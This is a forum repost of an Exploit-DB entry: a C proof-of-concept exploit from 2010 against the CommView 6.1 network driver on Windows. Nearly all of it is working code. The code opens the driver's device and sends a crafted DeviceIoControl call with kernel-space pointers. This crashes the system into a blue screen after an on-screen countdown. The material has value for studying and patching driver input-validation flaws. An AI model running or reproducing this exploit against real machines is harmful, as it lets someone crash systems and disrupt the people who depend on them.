Exploit CommView 6.1 (Build 636) - Local Blue Screen of Death (Denial of Service)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
12356
Проверка EDB
  1. Пройдено
Автор
P4R4N0ID
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
null
Дата публикации
2010-04-23
C:
/*-------------------------------------------------------------------------*/
/**
# Exploit Title : CommView Version 6.1 (Build 636) Local Denial Of Service (BSOD)   
# Corelan       : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-030
# Date          : April 23rd, 2010
# Author        : p4r4N0ID (T.B)
# Bug found by  : p4r4N0ID (T.B)
# Software Link : http://www.tamos.com/download/main/
# Version       : Version 6.1 (Build 636)
# OS            : Windows
# Tested on     : Windows XP sp2 En (VMWARE)
# Type of vuln  : DoS
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
**/
/*--------------------------------------------------------------------------*/

#include <windows.h>
#include <stdio.h>


VOID ShowError()
{
 LPVOID lpMsgBuf;
 FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
               NULL,
               GetLastError(),
               MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
               (LPTSTR) &lpMsgBuf,
               0,
               NULL);
 MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
 exit(1);
}


int __cdecl main( int argc , char * argv[])
{
	HANDLE		hDevice;
	DWORD       junk;
	int i = 10;

	system("cls");	
	printf ("|------------------------------------------------------------------|");
	printf ("|                         __               __                      |");
	printf ("|   _________  ________  / /___ _____     / /____  ____ _____ ___  |");
	printf ("|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |");
	printf ("| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |");
	printf ("| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |");
	printf ("|                                                                  |");
	printf ("|                                       http://www.corelan.be:8800 |");
	printf ("|                                              [email protected] |");
	printf ("|                                                                  |");
	printf ("|-------------------------------------------------[ EIP Hunters ]--|");
	printf ("[+] CommView Local Denial Of Service (BSOD) - by p4r4N0ID(T.B)");


	//CHANGE the GUID so it match your device name
	//find it in:  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{GUID}
	
	hDevice = CreateFileA("\\\\.\\CV2K_{916BB164-6D0D-45C0-B6C2-79B42A522C17}",
						   0,
						   FILE_SHARE_READ | FILE_SHARE_WRITE,
						   NULL,
						   OPEN_EXISTING,
						   0,
						   NULL);


	if (hDevice == INVALID_HANDLE_VALUE)
	{
		   ShowError();
		   return EXIT_FAILURE;
	}


	printf("\n\n\t\t[!] Started Countdown");

	for(i;i>=1;i--)
	{
		printf("\r -[ %d ]- ",i);

		if(i==1) printf("\n[+] Bye Bye, BOOM!!!");
		Sleep(1000);
	} 

	DeviceIoControl(hDevice, 
					0x00002578, 
					(LPVOID) 0x80000001,
					0,
					(LPVOID) 0x80000002,
					0,
					&junk,  
					(LPOVERLAPPED)NULL);


	return EXIT_SUCCESS;


}
 
Источник
www.exploit-db.com

Похожие темы